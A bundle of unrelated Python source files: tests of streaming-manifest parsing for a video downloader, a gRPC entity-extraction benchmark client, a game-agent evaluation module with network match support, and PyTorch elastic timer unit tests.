'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 698,
}, {
'format_id': 'video=1493000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 1126,
'height': 480,
'tbr': 1493,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 1493,
}, {
'format_id': 'video=4482000',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'ext': 'mp4',
'width': 1688,
'height': 720,
'tbr': 4482,
'format_note': 'DASH video',
'container': 'mp4_dash',
'vcodec': 'avc1.4D401F',
'acodec': 'none',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 4482,
}],
{
'en': [
{
'ext': 'mp4',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'fragment_base_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/dash/',
'protocol': 'http_dash_segments',
}
]
},
)
]
for mpd_file, mpd_url, mpd_base_url, expected_formats, expected_subtitles in _TEST_CASES:
with io.open('./test/testdata/mpd/%s.mpd' % mpd_file,
mode='r', encoding='utf-8') as f:
formats, subtitles = self.ie._parse_mpd_formats_and_subtitles(
compat_etree_fromstring(f.read().encode('utf-8')),
mpd_base_url=mpd_base_url, mpd_url=mpd_url)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
expect_value(self, subtitles, expected_subtitles, None)
def test_parse_ism_formats(self):
_TEST_CASES = [
(
'sintel',
'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
[{
'format_id': 'audio-128',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'isma',
'tbr': 128,
'asr': 48000,
'vcodec': 'none',
'acodec': 'AACL',
'protocol': 'ism',
'_download_params': {
'stream_type': 'audio',
'duration': 8880746666,
'timescale': 10000000,
'width': 0,
'height': 0,
'fourcc': 'AACL',
'codec_private_data': '1190',
'sampling_rate': 48000,
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'audio_ext': 'isma',
'video_ext': 'none',
'abr': 128,
}, {
'format_id': 'video-100',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 336,
'height': 144,
'tbr': 100,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 336,
'height': 144,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA0544EFFC2D002CBC40000003004000000C03C60CA80000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 100,
}, {
'format_id': 'video-326',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 562,
'height': 240,
'tbr': 326,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 562,
'height': 240,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA0241FE23FFC3BC83BA44000003000400000300C03C60CA800000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 326,
}, {
'format_id': 'video-698',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 844,
'height': 360,
'tbr': 698,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 844,
'height': 360,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA0350BFB97FF06AF06AD1000003000100000300300F1832A00000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 698,
}, {
'format_id': 'video-1493',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 1126,
'height': 480,
'tbr': 1493,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 1126,
'height': 480,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA011C3DE6FFF0D890D871000003000100000300300F1832A00000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 1493,
}, {
'format_id': 'video-4482',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'ext': 'ismv',
'width': 1688,
'height': 720,
'tbr': 4482,
'vcodec': 'AVC1',
'acodec': 'none',
'protocol': 'ism',
'_download_params': {
'stream_type': 'video',
'duration': 8880746666,
'timescale': 10000000,
'width': 1688,
'height': 720,
'fourcc': 'AVC1',
'codec_private_data': '00000001674D401FDA01A816F97FFC1ABC1AB440000003004000000C03C60CA80000000168EF32C8',
'channels': 2,
'bits_per_sample': 16,
'nal_unit_length_field': 4
},
'video_ext': 'ismv',
'audio_ext': 'none',
'vbr': 4482,
}],
{
'eng': [
{
'ext': 'ismt',
'protocol': 'ism',
'url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'manifest_url': 'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/Manifest',
'_download_params': {
'stream_type': 'text',
'duration': 8880746666,
'timescale': 10000000,
'fourcc': 'TTML',
'codec_private_data': ''
}
}
]
},
),
]
for ism_file, ism_url, expected_formats, expected_subtitles in _TEST_CASES:
with io.open('./test/testdata/ism/%s.Manifest' % ism_file,
mode='r', encoding='utf-8') as f:
formats, subtitles = self.ie._parse_ism_formats_and_subtitles(
compat_etree_fromstring(f.read().encode('utf-8')), ism_url=ism_url)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
expect_value(self, subtitles, expected_subtitles, None)
def test_parse_f4m_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/14660
'custom_base_url',
'http://api.new.livestream.com/accounts/6115179/events/6764928/videos/144884262.f4m',
[{
'manifest_url': 'http://api.new.livestream.com/accounts/6115179/events/6764928/videos/144884262.f4m',
'ext': 'flv',
'format_id': '2148',
'protocol': 'f4m',
'tbr': 2148,
'width': 1280,
'height': 720,
}]
),
]
for f4m_file, f4m_url, expected_formats in _TEST_CASES:
with io.open('./test/testdata/f4m/%s.f4m' % f4m_file,
mode='r', encoding='utf-8') as f:
formats = self.ie._parse_f4m_formats(
compat_etree_fromstring(f.read().encode('utf-8')),
f4m_url, None)
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
def test_parse_xspf(self):
_TEST_CASES = [
(
'foo_xspf',
'https://example.org/src/foo_xspf.xspf',
[{
'id': 'foo_xspf',
'title': 'Pandemonium',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 202.416,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/src/cd1/track%201.mp3',
}],
}, {
'id': 'foo_xspf',
'title': 'Final Cartridge (Nichico Twelve Remix)',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 255.857,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/%E3%83%88%E3%83%A9%E3%83%83%E3%82%AF%E3%80%80%EF%BC%92.mp3',
}],
}, {
'id': 'foo_xspf',
'title': 'Rebuilding Nightingale',
'description': 'Visit http://bigbrother404.bandcamp.com',
'duration': 287.915,
'formats': [{
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.org/src/track3.mp3',
}, {
'manifest_url': 'https://example.org/src/foo_xspf.xspf',
'url': 'https://example.com/track3.mp3',
}]
}]
),
]
for xspf_file, xspf_url, expected_entries in _TEST_CASES:
with io.open('./test/testdata/xspf/%s.xspf' % xspf_file,
mode='r', encoding='utf-8') as f:
entries = self.ie._parse_xspf(
compat_etree_fromstring(f.read().encode('utf-8')),
xspf_file, xspf_url=xspf_url, xspf_base_url=xspf_url)
expect_value(self, entries, expected_entries, None)
for i in range(len(entries)):
expect_dict(self, entries[i], expected_entries[i])
def test_response_with_expected_status_returns_content(self):
# Checks for mitigations against the effects of
# <https://bugs.python.org/issue15002> that affect Python 3.4.1+, which
# manifest as `_download_webpage`, `_download_xml`, `_download_json`,
# or the underlying `_download_webpage_handle` returning no content
# when a response matches `expected_status`.
httpd = compat_http_server.HTTPServer(
('127.0.0.1', 0), InfoExtractorTestRequestHandler)
port = http_server_port(httpd)
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.daemon = True
server_thread.start()
(content, urlh) = self.ie._download_webpage_handle(
'http://127.0.0.1:%d/teapot' % port, None,
expected_status=TEAPOT_RESPONSE_STATUS)
self.assertEqual(content, TEAPOT_RESPONSE_BODY)
if __name__ == '__main__':
unittest.main()
|
external_client.py
|
import grpc
import time
import statistics
# from threading import Thread
from alephclient.services.common_pb2 import Text
from alephclient.services.entityextract_pb2_grpc import EntityExtractStub
URL = 'localhost:50000'
TEXT = 'There was Joseph Stalin working at the Kremlin in Moscow'
channel = grpc.insecure_channel(URL)
service = EntityExtractStub(channel)
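# Simple latency benchmark: send the same sentence 100 times over the open
# channel and report the mean round-trip time of the Extract call.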
times = []
for i in range(100):
start = time.time()
image = Text(text=TEXT, languages=['en'])
for ent in service.Extract(image):
print(ent.text)
end = time.time()
times.append(end - start)
print(statistics.mean(times))
# def target():
# channel = grpc.insecure_channel(URL)
# service = EntityExtractStub(channel)
# for i in range(300):
# image = Text(text=TEXT, languages=['en'])
# for ent in service.Extract(image):
# # print(ent.text)
# pass
# for i in range(20):
# thread = Thread(target=target)
# # thread.daemon = True
# print(thread)
# thread.start()
|
evaluation.py
|
# Copyright (c) 2020 DeNA Co., Ltd.
# Licensed under The MIT License [see LICENSE for details]
# evaluation of policies or planning algorithms
import random
import time
import multiprocessing as mp
import numpy as np
from .environment import prepare_env, make_env
from .connection import send_recv, accept_socket_connections, connect_socket_connection
from .util import softmax
network_match_port = 9876
class RandomAgent:
def reset(self, env, show=False):
pass
def action(self, env, player, show=False):
actions = env.legal_actions(player)
return random.choice(actions)
def observe(self, env, player, show=False):
return 0.0
class RuleBasedAgent(RandomAgent):
def action(self, env, player, show=False):
if hasattr(env, 'rule_based_action'):
return env.rule_based_action(player)
else:
return random.choice(env.legal_actions(player))
def view(env, player=None):
if hasattr(env, 'view'):
env.view(player=player)
else:
print(env)
def view_transition(env):
if hasattr(env, 'view_transition'):
env.view_transition()
else:
pass
def print_outputs(env, prob, v):
if hasattr(env, 'print_outputs'):
env.print_outputs(prob, v)
else:
print('v = %f' % v)
print('p = %s' % (prob * 1000).astype(int))
class Agent:
def __init__(self, model, observation=False, temperature=0.0):
# model might be a neural net, or some planning algorithm such as game tree search
self.model = model
self.hidden = None
self.observation = observation
self.temperature = temperature
def reset(self, env, show=False):
self.hidden = self.model.init_hidden()
def plan(self, obs):
outputs = self.model.inference(obs, self.hidden)
self.hidden = outputs.pop('hidden', None)
return outputs
def action(self, env, player, show=False):
outputs = self.plan(env.observation(player))
actions = env.legal_actions(player)
p = outputs['policy']
v = outputs.get('value', None)
mask = np.ones_like(p)
mask[actions] = 0
p -= mask * 1e32
if show:
view(env, player=player)
print_outputs(env, softmax(p), v)
if self.temperature == 0:
ap_list = sorted([(a, p[a]) for a in actions], key=lambda x: -x[1])
return ap_list[0][0]
else:
return random.choices(np.arange(len(p)), weights=softmax(p / self.temperature))[0]
def observe(self, env, player, show=False):
if self.observation:
outputs = self.plan(env.observation(player))
v = outputs.get('value', None)
if show:
view(env, player=player)
if self.observation:
print_outputs(env, None, v)
class EnsembleAgent(Agent):
def reset(self, env, show=False):
self.hidden = [model.init_hidden() for model in self.model]
def plan(self, obs):
outputs = {}
for i, model in enumerate(self.model):
o = model.inference(obs, self.hidden[i])
            for k, v in o.items():
                if k == 'hidden':
                    self.hidden[i] = v
                else:
                    outputs[k] = outputs.get(k, []) + [v]
        for k, vl in outputs.items():
outputs[k] = np.mean(vl, axis=0)
return outputs
class SoftAgent(Agent):
def __init__(self, model, observation=False):
super().__init__(model, observation=observation, temperature=1.0)
class NetworkAgentClient:
def __init__(self, agent, env, conn):
self.conn = conn
self.agent = agent
self.env = env
def run(self):
while True:
command, args = self.conn.recv()
if command == 'quit':
break
elif command == 'outcome':
print('outcome = %f' % args[0])
elif hasattr(self.agent, command):
ret = getattr(self.agent, command)(self.env, *args, show=True)
if command == 'action':
player = args[0]
ret = self.env.action2str(ret, player)
else:
ret = getattr(self.env, command)(*args)
if command == 'update':
view_transition(self.env)
self.conn.send(ret)
class NetworkAgent:
def __init__(self, conn):
self.conn = conn
def update(self, data, reset):
return send_recv(self.conn, ('update', [data, reset]))
def outcome(self, outcome):
return send_recv(self.conn, ('outcome', [outcome]))
def action(self, player):
return send_recv(self.conn, ('action', [player]))
def observe(self, player):
return send_recv(self.conn, ('observe', [player]))
def exec_match(env, agents, critic, show=False, game_args={}):
''' match with shared game environment '''
if env.reset(game_args):
return None
for agent in agents.values():
agent.reset(env, show=show)
while not env.terminal():
if show and critic is not None:
print('cv = ', critic.observe(env, None, show=False)[0])
turn_players = env.turns()
actions = {}
for p, agent in agents.items():
if p in turn_players:
actions[p] = agent.action(env, p, show=show)
else:
agent.observe(env, p, show=show)
if env.step(actions):
return None
if show:
view_transition(env)
outcome = env.outcome()
if show:
print('final outcome = %s' % outcome)
return outcome
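# Illustrative usage sketch (the environment arguments below are hypothetical;
# any env prepared via make_env works, with one agent per player id):
#   env = make_env({'env': 'TicTacToe'})
#   agents = {p: RandomAgent() for p in env.players()}
#   outcome = exec_match(env, agents, critic=None)  # player -> outcome, or None on failure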
def exec_network_match(env, network_agents, critic, show=False, game_args={}):
''' match with divided game environment '''
if env.reset(game_args):
return None
for p, agent in network_agents.items():
info = env.diff_info(p)
agent.update(info, True)
while not env.terminal():
if show and critic is not None:
print('cv = ', critic.observe(env, None, show=False)[0])
turn_players = env.turns()
actions = {}
for p, agent in network_agents.items():
if p in turn_players:
action = agent.action(p)
actions[p] = env.str2action(action, p)
else:
agent.observe(p)
if env.step(actions):
return None
for p, agent in network_agents.items():
info = env.diff_info(p)
agent.update(info, False)
outcome = env.outcome()
for p, agent in network_agents.items():
agent.outcome(outcome[p])
return outcome
class Evaluator:
def __init__(self, env, args):
self.env = env
self.args = args
self.default_agent = RandomAgent() # RuleBasedAgent, trained agent, etc.
def execute(self, models, args):
agents = {}
for p, model in models.items():
if model is None:
agents[p] = self.default_agent
else:
agents[p] = Agent(model, self.args['observation'])
outcome = exec_match(self.env, agents, None)
if outcome is None:
print('None episode in evaluation!')
return None
return {'args': args, 'result': outcome}
def wp_func(results):
games = sum([v for k, v in results.items() if k is not None])
win = sum([(k + 1) / 2 * v for k, v in results.items() if k is not None])
if games == 0:
return 0.0
return win / games
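# Worked example (illustrative): outcomes are assumed to lie in [-1, 1], and
# (k + 1) / 2 maps a win (+1) to 1.0, a draw (0) to 0.5 and a loss (-1) to 0.0, so
#   wp_func({1: 6, -1: 3, 0: 1}) == (6 * 1.0 + 3 * 0.0 + 1 * 0.5) / 10 == 0.65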
def eval_process_mp_child(agents, critic, env_args, index, in_queue, out_queue, seed, show=False):
random.seed(seed + index)
env = make_env({**env_args, 'id': index})
while True:
args = in_queue.get()
if args is None:
break
g, agent_ids, pat_idx, game_args = args
print('*** Game %d ***' % g)
agent_map = {env.players()[p]: agents[ai] for p, ai in enumerate(agent_ids)}
if isinstance(list(agent_map.values())[0], NetworkAgent):
outcome = exec_network_match(env, agent_map, critic, show=show, game_args=game_args)
else:
outcome = exec_match(env, agent_map, critic, show=show, game_args=game_args)
out_queue.put((pat_idx, agent_ids, outcome))
out_queue.put(None)
def evaluate_mp(env, agents, critic, env_args, args_patterns, num_process, num_games, seed):
in_queue, out_queue = mp.Queue(), mp.Queue()
args_cnt = 0
total_results, result_map = [{} for _ in agents], [{} for _ in agents]
print('total games = %d' % (len(args_patterns) * num_games))
time.sleep(0.1)
for pat_idx, args in args_patterns.items():
for i in range(num_games):
if len(agents) == 2:
# When playing two player game,
# the number of games with first or second player is equalized.
first_agent = 0 if i < (num_games + 1) // 2 else 1
tmp_pat_idx, agent_ids = (pat_idx + '-F', [0, 1]) if first_agent == 0 else (pat_idx + '-S', [1, 0])
else:
tmp_pat_idx, agent_ids = pat_idx, random.sample(list(range(len(agents))), len(agents))
in_queue.put((args_cnt, agent_ids, tmp_pat_idx, args))
for p in range(len(agents)):
result_map[p][tmp_pat_idx] = {}
args_cnt += 1
network_mode = agents[0] is None
if network_mode: # network battle mode
agents = network_match_acception(num_process, env_args, len(agents), network_match_port)
else:
agents = [agents] * num_process
for i in range(num_process):
in_queue.put(None)
args = agents[i], critic, env_args, i, in_queue, out_queue, seed
if num_process > 1:
mp.Process(target=eval_process_mp_child, args=args).start()
if network_mode:
for agent in agents[i]:
agent.conn.close()
else:
eval_process_mp_child(*args, show=True)
finished_cnt = 0
while finished_cnt < num_process:
ret = out_queue.get()
if ret is None:
finished_cnt += 1
continue
pat_idx, agent_ids, outcome = ret
if outcome is not None:
for idx, p in enumerate(env.players()):
agent_id = agent_ids[idx]
oc = outcome[p]
result_map[agent_id][pat_idx][oc] = result_map[agent_id][pat_idx].get(oc, 0) + 1
total_results[agent_id][oc] = total_results[agent_id].get(oc, 0) + 1
for p, r_map in enumerate(result_map):
print('---agent %d---' % p)
for pat_idx, results in r_map.items():
print(pat_idx, {k: results[k] for k in sorted(results.keys(), reverse=True)}, wp_func(results))
print('total', {k: total_results[p][k] for k in sorted(total_results[p].keys(), reverse=True)}, wp_func(total_results[p]))
def network_match_acception(n, env_args, num_agents, port):
waiting_conns = []
accepted_conns = []
for conn in accept_socket_connections(port):
if len(accepted_conns) >= n * num_agents:
break
waiting_conns.append(conn)
if len(waiting_conns) == num_agents:
conn = waiting_conns[0]
accepted_conns.append(conn)
waiting_conns = waiting_conns[1:]
conn.send(env_args) # send accept with environment arguments
agents_list = [
[NetworkAgent(accepted_conns[i * num_agents + j]) for j in range(num_agents)]
for i in range(n)
]
return agents_list
def get_model(env, model_path):
import torch
from .model import SimpleConv2dModel as DefaultModel
model = env.net()(env) if hasattr(env, 'net') else DefaultModel(env)
model.load_state_dict(torch.load(model_path))
model.eval()
return model
def client_mp_child(env_args, model_path, conn):
env = make_env(env_args)
model = get_model(env, model_path)
NetworkAgentClient(Agent(model), env, conn).run()
def eval_main(args, argv):
env_args = args['env_args']
prepare_env(env_args)
env = make_env(env_args)
model_path = argv[0] if len(argv) >= 1 else 'models/latest.pth'
num_games = int(argv[1]) if len(argv) >= 2 else 100
num_process = int(argv[2]) if len(argv) >= 3 else 1
agent1 = Agent(get_model(env, model_path))
critic = None
print('%d process, %d games' % (num_process, num_games))
seed = random.randrange(1e8)
print('seed = %d' % seed)
agents = [agent1] + [RandomAgent() for _ in range(len(env.players()) - 1)]
evaluate_mp(env, agents, critic, env_args, {'default': {}}, num_process, num_games, seed)
def eval_server_main(args, argv):
print('network match server mode')
env_args = args['env_args']
prepare_env(env_args)
env = make_env(env_args)
num_games = int(argv[0]) if len(argv) >= 1 else 100
num_process = int(argv[1]) if len(argv) >= 2 else 1
print('%d process, %d games' % (num_process, num_games))
seed = random.randrange(1e8)
print('seed = %d' % seed)
evaluate_mp(env, [None] * len(env.players()), None, env_args, {'default': {}}, num_process, num_games, seed)
def eval_client_main(args, argv):
print('network match client mode')
while True:
try:
host = argv[1] if len(argv) >= 2 else 'localhost'
conn = connect_socket_connection(host, network_match_port)
env_args = conn.recv()
except EOFError:
break
model_path = argv[0] if len(argv) >= 1 else 'models/latest.pth'
mp.Process(target=client_mp_child, args=(env_args, model_path, conn)).start()
conn.close()
|
local_timer_test.py
|
# Owner(s): ["oncall: r2p"]
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import signal
import time
import unittest
import unittest.mock as mock
import torch.distributed.elastic.timer as timer
from torch.distributed.elastic.timer.api import TimerRequest
from torch.distributed.elastic.timer.local_timer import MultiprocessingRequestQueue
from torch.testing._internal.common_utils import (
run_tests,
IS_WINDOWS,
IS_MACOS,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_TSAN,
TestCase
)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
# func2 should time out
def func2(n, mp_queue):
if mp_queue is not None:
timer.configure(timer.LocalTimerClient(mp_queue))
if n > 0:
with timer.expires(after=0.1):
func2(n - 1, None)
time.sleep(0.2)
class LocalTimerTest(TestCase):
def setUp(self):
super().setUp()
self.ctx = mp.get_context("spawn")
self.mp_queue = self.ctx.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
self.server.start()
def tearDown(self):
super().tearDown()
self.server.stop()
def test_exception_propagation(self):
with self.assertRaises(Exception, msg="foobar"):
with timer.expires(after=1):
raise Exception("foobar")
def test_no_client(self):
# no timer client configured; exception expected
timer.configure(None)
with self.assertRaises(RuntimeError):
with timer.expires(after=1):
pass
def test_client_interaction(self):
# no timer client configured but one passed in explicitly
# no exception expected
timer_client = timer.LocalTimerClient(self.mp_queue)
timer_client.acquire = mock.MagicMock(wraps=timer_client.acquire)
timer_client.release = mock.MagicMock(wraps=timer_client.release)
with timer.expires(after=1, scope="test", client=timer_client):
pass
timer_client.acquire.assert_called_once_with("test", mock.ANY)
timer_client.release.assert_called_once_with("test")
def test_happy_path(self):
timer.configure(timer.LocalTimerClient(self.mp_queue))
with timer.expires(after=0.5):
time.sleep(0.1)
def test_get_timer_recursive(self):
"""
If a function acquires a countdown timer with default scope,
then recursive calls to the function should re-acquire the
        timer rather than creating a new one. That is, only the last
        recursive call's timer will take effect.
"""
self.server.start()
timer.configure(timer.LocalTimerClient(self.mp_queue))
# func should not time out
def func(n):
if n > 0:
with timer.expires(after=0.1):
func(n - 1)
time.sleep(0.05)
func(4)
p = self.ctx.Process(target=func2, args=(2, self.mp_queue))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
@staticmethod
def _run(mp_queue, timeout, duration):
client = timer.LocalTimerClient(mp_queue)
timer.configure(client)
with timer.expires(after=timeout):
time.sleep(duration)
@unittest.skipIf(TEST_WITH_TSAN, "test is tsan incompatible")
def test_timer(self):
timeout = 0.1
duration = 1
p = mp.Process(target=self._run, args=(self.mp_queue, timeout, duration))
p.start()
p.join()
self.assertEqual(-signal.SIGKILL, p.exitcode)
def _enqueue_on_interval(mp_queue, n, interval, sem):
"""
    enqueues ``n`` timer requests into ``mp_queue``, one element every
    ``interval`` seconds. Releases the given semaphore once before going to work.
"""
sem.release()
for i in range(0, n):
mp_queue.put(TimerRequest(i, "test_scope", 0))
time.sleep(interval)
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
class MultiprocessingRequestQueueTest(TestCase):
def test_get(self):
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
requests = request_queue.get(1, timeout=0.01)
self.assertEqual(0, len(requests))
request = TimerRequest(1, "test_scope", 0)
mp_queue.put(request)
requests = request_queue.get(2, timeout=0.01)
self.assertEqual(1, len(requests))
self.assertIn(request, requests)
@unittest.skipIf(
TEST_WITH_TSAN,
"test incompatible with tsan",
)
def test_get_size(self):
"""
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=n*interval+delta)``
yields all ``n`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(
target=_enqueue_on_interval, args=(mp_queue, n, interval, sem)
)
p.start()
sem.acquire() # blocks until the process has started to run the function
timeout = interval * (n + 1)
start = time.time()
requests = request_queue.get(n, timeout=timeout)
self.assertLessEqual(time.time() - start, timeout + interval)
self.assertEqual(n, len(requests))
def test_get_less_than_size(self):
"""
Tests slow producer.
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=(interval * n/2))``
yields at most ``n/2`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(
target=_enqueue_on_interval, args=(mp_queue, n, interval, sem)
)
p.start()
sem.acquire() # blocks until the process has started to run the function
requests = request_queue.get(n, timeout=(interval * (n / 2)))
self.assertLessEqual(n / 2, len(requests))
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
class LocalTimerServerTest(TestCase):
def setUp(self):
super().setUp()
self.mp_queue = mp.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
def tearDown(self):
super().tearDown()
self.server.stop()
def test_watchdog_call_count(self):
"""
checks that the watchdog function ran wait/interval +- 1 times
"""
self.server._run_watchdog = mock.MagicMock(wraps=self.server._run_watchdog)
wait = 0.1
self.server.start()
time.sleep(wait)
self.server.stop()
watchdog_call_count = self.server._run_watchdog.call_count
self.assertGreaterEqual(
watchdog_call_count, int(wait / self.max_interval) - 1
)
self.assertLessEqual(watchdog_call_count, int(wait / self.max_interval) + 1)
def test_watchdog_empty_queue(self):
"""
checks that the watchdog can run on an empty queue
"""
self.server._run_watchdog()
def _expired_timer(self, pid, scope):
expired = time.time() - 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=expired)
def _valid_timer(self, pid, scope):
valid = time.time() + 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=valid)
def _release_timer(self, pid, scope):
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=-1)
@mock.patch("os.kill")
def test_expired_timers(self, mock_os_kill):
"""
        tests that a single expired timer on a process terminates
        the process and cleans up all pending timers that were owned by the process
"""
test_pid = -3
self.mp_queue.put(self._expired_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_called_once_with(test_pid, signal.SIGKILL)
@mock.patch("os.kill")
